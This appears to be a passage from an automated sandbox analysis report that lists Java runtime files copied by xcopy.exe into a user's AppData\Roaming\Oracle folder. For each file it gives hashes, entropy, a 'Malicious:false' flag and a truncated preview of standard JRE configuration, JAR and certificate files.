                                                                                                                                                                                                                                  SHA-512:DE49913B8FA2593DC71FF8DAC85214A86DE891BEDEE0E4C5A70FCDD34E605F8C5C8483E2F1BDB06E1001F7A8CF3C86CAD9FA575DE1A4DC466E0C8FF5891A2773
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:######################################################################.# Default Access Control File for Remote JMX(TM) Monitoring.######################################################################.#.# Access control file for Remote JMX API access to monitoring..# This file defines the allowed access for different roles. The.# password file (jmxremote.password by default) defines the roles and their.# passwords. To be functional, a role must have an entry in.# both the password and the access files..#.# The default location of this file is $JRE/lib/management/jmxremote.access.# You can specify an alternate location by specifying a property in .# the management config file $JRE/lib/management/management.properties.# (See that file for details).#.# The file format for password and access files is syntactically the same.# as the Properties file format. The syntax is described in the Javadoc.# for java.util.Properties.load..# A typical access file has multiple lines, where each

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\management\jmxremote.password.template

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2856
                                                                                                                                                                                                                                  Entropy (8bit):4.492265087792545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MGS+Hpamow7YNkjP9YZAuFovuAnNpG1GMV/BWEUHXYE9nN6k5:Mdm7RT9tvuAnujaE0rN6g
                                                                                                                                                                                                                                  MD5:7B46C291E7073C31D3CE0ADAE2F7554F
                                                                                                                                                                                                                                  SHA1:C1E0F01408BF20FBBB8B4810520C725F70050DB5
                                                                                                                                                                                                                                  SHA-256:3D83E336C9A24D09A16063EA1355885E07F7A176A37543463596B5DB8D82F8FA
                                                                                                                                                                                                                                  SHA-512:D91EEBC8F30EDCE1A7E16085EB1B18CFDDF0566EFAB174BBCA53DE453EE36DFECB747D401E787A4D15CC9798E090E19A8A0CF3FC8246116CE507D6B464068CDB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ----------------------------------------------------------------------.# Template for jmxremote.password.#.# o Copy this template to jmxremote.password.# o Set the user/password entries in jmxremote.password.# o Change the permission of jmxremote.password to read-only.# by the owner..#.# See below for the location of jmxremote.password file..# ----------------------------------------------------------------------..##############################################################.# Password File for Remote JMX Monitoring.##############################################################.#.# Password file for Remote JMX API access to monitoring. This.# file defines the different roles and their passwords. The access.# control file (jmxremote.access by default) defines the allowed.# access for each role. To be functional, a role must have an entry.# in both the password and the access files..#.# Default location of this file is $JRE/lib/management/jmxremote.password.# You

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\management\management.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14630
                                                                                                                                                                                                                                  Entropy (8bit):4.568210341404396
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Fqsmpsj42wbZTHV+Dq3xtP3xPqaNC/R1a:wsmpsjL0ZTHV++3xtpi68Xa
                                                                                                                                                                                                                                  MD5:5EDB0D3275263013F0981FF0DF96F87E
                                                                                                                                                                                                                                  SHA1:E0451D8D7D9E84D7B1C39EC7D00993307A5CBBF1
                                                                                                                                                                                                                                  SHA-256:3A923735D9C2062064CD8FD30FF8CCA84D0BC0AB5A8FAB80FDAD3155C0E3A380
                                                                                                                                                                                                                                  SHA-512:F31A3802665F9BB1A00A0F838B94AE4D9F1B9D6284FAF626EBE4F96819E24494771A1B8BFE655FD2DA202C5463D47BAE3B2391764E6F4C5867C0337AA21C87C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#####################################################################.#.Default Configuration File for Java Platform Management.#####################################################################.#.# The Management Configuration file (in java.util.Properties format).# will be read if one of the following system properties is set:.# -Dcom.sun.management.jmxremote.port=<port-number>.# or -Dcom.sun.management.snmp.port=<port-number>.# or -Dcom.sun.management.config.file=<this-file>.#.# The default Management Configuration file is:.#.# $JRE/lib/management/management.properties.#.# Another location for the Management Configuration File can be specified.# by the following property on the Java command line:.#.# -Dcom.sun.management.config.file=<this-file>.#.# If -Dcom.sun.management.config.file=<this-file> is set, the port.# number for the management agent can be specified in the config file.# using the following lines:.#.# ################ Management Agent Port ################

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\management\snmp.acl.template

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3376
                                                                                                                                                                                                                                  Entropy (8bit):4.371600962667748
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MkX7W6+IX6XXZAHAvuAn97+onkFOqRCjEhd//SVBteM8hq/unuxsIsxuEAJw2n:MU6bpjvuAnEokSIU/uuxJn
                                                                                                                                                                                                                                  MD5:71A7DE7DBE2977F6ECE75C904D430B62
                                                                                                                                                                                                                                  SHA1:2E9F9AC287274532EB1F0D1AFCEFD7F3E97CC794
                                                                                                                                                                                                                                  SHA-256:F1DC97DA5A5D220ED5D5B71110CE8200B16CAC50622B33790BB03E329C751CED
                                                                                                                                                                                                                                  SHA-512:3A46E2A4E8A78B190260AFE4EEB54E7D631DB50E6776F625861759C0E0BC9F113E8CD8D734A52327C28608715F6EB999A3684ABD83EE2970274CE04E56CA1527
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ----------------------------------------------------------------------.# Template for SNMP Access Control List File.#.# o Copy this template to snmp.acl.# o Set access control for SNMP support.# o Change the permission of snmp.acl to be read-only.# by the owner..#.# See below for the location of snmp.acl file..# ----------------------------------------------------------------------..############################################################.# SNMP Access Control List File .############################################################.#.# Default location of this file is $JRE/lib/management/snmp.acl..# You can specify an alternate location by specifying a property in .# the management config file $JRE/lib/management/management.properties.# or by specifying a system property (See that file for details)..#...##############################################################.# File permissions of the snmp.acl file.##############################################

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\meta-index

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2126
                                                                                                                                                                                                                                  Entropy (8bit):4.970874214349507
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                                                                                                                                                                                                                  MD5:91AA6EA7320140F30379F758D626E59D
                                                                                                                                                                                                                                  SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                                                                                                                                                                                                                  SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                                                                                                                                                                                                                  SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\net.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5352
                                                                                                                                                                                                                                  Entropy (8bit):4.817652960703195
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6AcEvVEtGObfObz3Obm0ObPOnte3CO0V+r/aJ7SFvgTzDuBnZky:YEVGG4f4z34m04Pet5m27SRgTe9f
                                                                                                                                                                                                                                  MD5:8BC6628D01BAD30798440CC00F638165
                                                                                                                                                                                                                                  SHA1:FD9471742EB759F4478BB1DE9A0DC0527265B6EA
                                                                                                                                                                                                                                  SHA-256:31CE7CE29C66A1696A985A197195B5E051B2C243EA83E9D1DE614F0C4B4F7530
                                                                                                                                                                                                                                  SHA-512:8DA3439774A07A6309F985D1A29DDA5383975BBDF6B8E2809BAB69A2C44F65D3DE2A546231ED6E183864193F834C9A7042FDCC4EE10181D0BD3891363032C242
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:############################################################.# Default Networking Configuration File.#.# This file may contain default values for the networking system properties..# These values are only used when the system properties are not specified.# on the command line or set programatically..# For now, only the various proxy settings can be configured here..############################################################..# Whether or not the DefaultProxySelector will default to System Proxy.# settings when they do exist..# Set it to 'true' to enable this feature and check for platform.# specific proxy settings.# Note that the system properties that do explicitely set proxies.# (like http.proxyHost) do take precedence over the system settings.# even if java.net.useSystemProxies is set to true...java.net.useSystemProxies=false..#------------------------------------------------------------------------.# Proxy configuration for the various protocol handlers..# DO NOT uncomment th

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\plugin.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1924789
                                                                                                                                                                                                                                  Entropy (8bit):6.073418732218999
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:C+jgNAr7NJVQSWUNZU4sTwIH+/G5jyvsZ:CSgNwxJ5PZdG5lZ
                                                                                                                                                                                                                                  MD5:32A464B5B6584C2A54B86F477A29DF5A
                                                                                                                                                                                                                                  SHA1:6F2C8CF78D9074C81D3E874C7C0116402AEEF8E2
                                                                                                                                                                                                                                  SHA-256:B57B5A8EC4034C39452DF10E03AA6E4C98309524D6C90CC87A440790AB29FBC9
                                                                                                                                                                                                                                  SHA-512:9D03871B3D5648D32B127F482758C908A89CD0E3033E530AB02F1F96A9F73172D8770E9491961C8CD4D28C74651C4B18069B8880D6DCE8F8576765EF08AA8C9B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.VB1.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_381-b09 (Oracle Corporation)....PK.........p.V................com/PK.........p.V................com/sun/PK.........p.V................com/sun/deploy/PK.........p.V................com/sun/deploy/uitoolkit/PK.........p.V................com/sun/deploy/uitoolkit/impl/PK.........p.V............"...com/sun/deploy/uitoolkit/impl/awt/PK.........p.V............#...com/sun/deploy/uitoolkit/impl/text/PK.........p.V................com/sun/deploy/uitoolkit/ui/PK.........p.V................com/sun/java/PK.........p.V................com/sun/java/browser/PK.........p.V................com/sun/java/browser/plugin2/PK.........p.V............)...com/sun/java/browser/plugin2/liveconnect/PK.........p.V............,...com/sun/java/browser/plugin2/liveconnect/v1/PK.........p.V................netscape/PK.........p.V................netscape/javascr

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\psfont.properties.ja

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2796
                                                                                                                                                                                                                                  Entropy (8bit):5.182793663606788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:R8s89HoIbTUjbyuJdI2FylXLr96cpcnnI0adbEk+IqdouZ:y56CiPFylXLrMGyJU+B
                                                                                                                                                                                                                                  MD5:7C5514B805B4A954BC55D67B44330C69
                                                                                                                                                                                                                                  SHA1:56ED1C661EEEDE17B4FAE8C9DE7B5EDBAD387ABC
                                                                                                                                                                                                                                  SHA-256:0C790DE696536165913685785EA8CBE1AC64ACF09E2C8D92D802083A6DA09393
                                                                                                                                                                                                                                  SHA-512:CCD4CB61C95DEFDCBA6A6A3F898C29A64CD5831A8AB50E0AFAC32ADB6A9E0C4A4BA37EB6DEE147830DA33AE0B2067473132C0B91A21D546A6528F42267A2C40E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.#.# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.#.Japanese PostScript printer property file.#.font.num=16.#.serif=serif.timesroman=serif.sansserif=sansserif.helvetica=sansserif.monospaced=monospaced.courier=monospaced.dialog=sansserif.dialoginput=monospaced.#.serif.latin1.plain=Times-Roman.serif.latin1.italic=Times-Italic.serif.latin1.bolditalic=Times-BoldItalic.serif.latin1.bold=Times-Bold.#.sansserif.latin1.plain=Helvetica.sansserif.latin1.italic=Helvetica-Oblique.sansserif.latin1.bolditalic=Helvetica-BoldOblique.sansserif.latin1.bold=Helvetica-Bold.#.monospaced.latin1.plain=Courier.monospaced.latin1.italic=Courier-Oblique.monospaced.latin1.bolditalic=Courier-BoldOblique.monospaced.latin1.bold=Courier-Bold.#.serif.x11jis0208.plain=Ryumin-Light-H.serif.x11jis0208.italic=Ryumin-Light-H.serif.x11jis0208.bolditalic=Ryumin-Light-H.serif.x11jis

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\psfontj2d.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10393
                                                                                                                                                                                                                                  Entropy (8bit):4.970762688893053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:hPwn+Cyub3Ee4OECKDIcYOhAgZ50OKDQLT2IcpRuWRbHr9NRXUh/QTv9Ho39zPxq:5xzubEFOEscAW5VKsCfHz8RPxGt
                                                                                                                                                                                                                                  MD5:F8734590A1AEC97F6B22F08D1AD1B4BB
                                                                                                                                                                                                                                  SHA1:AA327A22A49967F4D74AFEEE6726F505F209692F
                                                                                                                                                                                                                                  SHA-256:7D51936FA3FD5812AE51F9F5657E0E70487DCA810B985607B6C5D6603F5E6C98
                                                                                                                                                                                                                                  SHA-512:72E62DC63DAA2591B48B2B774E2479B8861D159061B92FD3A0A06256295DA4D8B20DAFA77983FDBF6179F666F9FF6B3275F7A5BCF9555E638595230B9A42B177
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.#.# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.#.PostScript printer property file for Java 2D printing..#.# WARNING: This is an internal implementation file, not a public file..# Any customisation or reliance on the existence of this file and its.# contents or syntax is discouraged and unsupported..# It may be incompatibly changed or removed without any notice..#.#.font.num=35.#.# Legacy logical font family names and logical font aliases should all.# map to the primary logical font names..#.serif=serif.times=serif.timesroman=serif.sansserif=sansserif.helvetica=sansserif.dialog=sansserif.dialoginput=monospaced.monospaced=monospaced.courier=monospaced.#.# Next, physical fonts which can be safely mapped to standard postscript fonts.# These keys generally map to a value which is the same as the key, so.# the key/value is just a way to say the font has

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\resources.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3547798
                                                                                                                                                                                                                                  Entropy (8bit):6.059253420631559
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:BzJYGPpxjOBAS++jqWr739qhgO587exNJrGAhiDwthCHJu9r2JcaD4oc2HmtjLbH:wKl82
                                                                                                                                                                                                                                  MD5:9D80C1B2B0177CF33D9EBC064EC11D24
                                                                                                                                                                                                                                  SHA1:1E449A2FC33CC95F72FD1916380DFB3B2C08CAD6
                                                                                                                                                                                                                                  SHA-256:AD4DF96ED8A499A3F44A60D787ED3742007A213807058C82903AD3A5C2B41972
                                                                                                                                                                                                                                  SHA-512:250E4299CECB42D3E106F28561CD743CD2CD01AE9E68D53ADF4074F5B884FA9E86DD25B8590E96349F155AF09C983B777D7C3F3AAB6FF30EFED80034070CBA1C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK........fn.V....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK........fn.V..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\rt.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55853982
                                                                                                                                                                                                                                  Entropy (8bit):6.048844892791932
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:393216:wvBSlf1XqxsGxz9r5t2UQ6q6px4J1FvsA:wvBSlw/pr5t2UQ6q6px4J1FH
                                                                                                                                                                                                                                  MD5:4902458FF7CFFAA64B42E3EE3B98BEAA
                                                                                                                                                                                                                                  SHA1:3D19509EEF9DD17F54986F8B12CD8F7417D0AED6
                                                                                                                                                                                                                                  SHA-256:81A3F6849D610119D4D6FE1500C9DD34566E88621E0B3D1258A92D8791540AFF
                                                                                                                                                                                                                                  SHA-512:FA1A30E9C6E14B14EC450BDE57EF2EEFE050EC82E41E742B6A83540900D8290FE8AA0D00F8D5C15AD1F3D174132ECB1EDD726311ED09EBB08B568627222F5FEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V.<|.&...&.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bea

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\blacklist

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4054
                                                                                                                                                                                                                                  Entropy (8bit):5.791238368311065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uudVZoOZ3mFcFtqZB0q6jV//H2cB/iye6S04UioQeXbZFf6HULUBnSQXHvLnOTSW:uudVZoOZ3mFcXqZB0q6B//H2cB/Ze6SG
                                                                                                                                                                                                                                  MD5:B2C6EAE6382150192EA3912393747180
                                                                                                                                                                                                                                  SHA1:D4FFB3857EAB403955CE9D156E46D056061E6A5A
                                                                                                                                                                                                                                  SHA-256:6C73C877B36D4ABD086CB691959B180513AC5ABC0C87FE9070D2D5426D3DBF71
                                                                                                                                                                                                                                  SHA-512:898582C23F311F9F46825E7F8B6D36BED7255E5A4E2FA4B4452153B86EFBD88DB7E5B94DBD9CB9DB554F62B84D19F22AE9D81822B4896081C487FB50946A9A9A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# JNLPAppletLauncher applet-launcher.jar.SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=..# 7066583.SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=.SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=.SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=..# 7066809.SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=.SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=.SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=..# 7186931.SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=.SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=.SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=.SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=.SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=.SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=.SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=.SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=.SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=.SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=.SHA1-Digest-Manifest: g3mA5HqcRBlKaUVQsapnKhOSEas=.SHA1-Dig

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\blacklisted.certs

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2527
                                                                                                                                                                                                                                  Entropy (8bit):4.141598882390435
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:NjYQMQgcJrrDJOz74ZeKnZqUyYuj4G0o5xz4lCENa+qJe:NjYQbTwzkZeKnZqUfGxzWCEPqU
                                                                                                                                                                                                                                  MD5:8273F70416F494F7FA5B6C70A101E00E
                                                                                                                                                                                                                                  SHA1:AEAEBB14FBF146FBB0AAF347446C08766C86CA7F
                                                                                                                                                                                                                                  SHA-256:583500B76965EB54B03493372989AB4D3426F85462D1DB232C5AE6706A4D6C58
                                                                                                                                                                                                                                  SHA-512:E697A57D64ACE1F302300F83E875C2726407F8DAF7C1D38B07AB8B4B11299FD698582D825BEE817A1AF85A285F27877A9E603E48E01C72E482A04DC7AB12C8DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Algorithm=SHA-256..03DB9E5E79FE6117177F81C11595AF598CB176AF766290DBCEB2C318B32E39A2..08C396C006A21055D00826A5781A5CCFCE2C8D053AB3C197637A4A7A5BB9A650..14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD..1C5E6985ACC09221DBD1A4B7BBC6D3A8C3F8540D19F20763A9537FDD42B4FFE7..1F6BF8A3F2399AF7FD04516C2719C566CBAD51F412738F66D0457E1E6BDE6F2D..2A464E4113141352C7962FBD1706ED4B88533EF24D7BBA6CCC5D797FD202F1C4..31C8FD37DB9B56E708B03D1F01848B068C6DA66F36FB5D82C008C6040FA3E133..3946901F46B0071E90D78279E82FABABCA177231A704BE72C5B0E8918566EA66..3E11CF90719F6FB44D94EAC9A156B89BEBE7B8598F28EC58913F2BFCAF91D0C0..423279423B9FC8CB06F1BB7C3B247522B948D5F18939F378ECC901126DE40BFB..450F1B421BB05C8609854884559C323319619E8B06B001EA2DCBB74A23AA3BE2..4CBBF8256BC9888A8007B2F386940A2E394378B0D903CBB3863C5A6394B889CE..4FEE0163686ECBD65DB968E7494F55D84B25486D438E9DE558D629D28CD4D176..535D04DFCE027C70BD5F8A9E0AD4F218E9AFDCF5BBCF9B6DE0D81E148E2E3172..568FAF38D9F155F624838E2181B1CEB4D8459305EE652B0F810C97C36

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\cacerts

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java KeyStore
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):112247
                                                                                                                                                                                                                                  Entropy (8bit):7.6321690047084525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:lK1kNaUXlk471L8Q0WEXOQHoftVcKIt8nUNTalyCpqszxa:II84xF0WDyoteKIWU8lyCpba
                                                                                                                                                                                                                                  MD5:25091C226F74B16353AECB8C982CB075
                                                                                                                                                                                                                                  SHA1:90712B8F8DD4D651973FA0CF91A4BA7FF9BBEB64
                                                                                                                                                                                                                                  SHA-256:878AE02BF6F6723B034EF7B826E7D17A31F266CAB1BFE088080D8AD2AD167C75
                                                                                                                                                                                                                                  SHA-512:4FECD5A4E3F246BECEF9EB8DE6D357E85D71E6B8506C4E96E3083ADAE6AA24B2DE3ED87321BD2F1CAD15C8411C4D2EB254ACEA119CE78B9AB561CC9BC783F23D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........b......sslrooteccca [jdk]...s.. ...X.509....0...0..........u....h[.0...*.H.=...0|1.0...U....US1.0...U....Texas1.0...U....Houston1.0...U....SSL Corporation110/..U...(SSL.com Root Certification Authority ECC0...160212181403Z..410212181403Z0|1.0...U....US1.0...U....Texas1.0...U....Houston1.0...U....SSL Corporation110/..U...(SSL.com Root Certification Authority ECC0v0...*.H.=....+...".b..En.P.#6._(..."d?.z......q$..I...G.X.-....5.'.SX.b...[.k1RcA;......4......E.....#.....G.c0a0...U........s0.5........!..0...U.......0....0...U.#..0.....s0.5........!..0...U...........0...*.H.=....g.0d.0o..Y..`.a..{.../......Pk.FF..!.b...........]r>..0.....0$.|m.U..>..3.f........,.]~....hm.|in_..je......digicertassuredidg3 [jdk]...V.H.8..X.509...J0..F0...........Z....ID..$.l.0...*.H.=...0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root G30...130801120000Z..380115120000Z0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicer

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\security\java.policy

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2564
                                                                                                                                                                                                                                  Entropy (8bit):4.435878574816843
                                                                                                                                                                                                                                  Encrypted:false
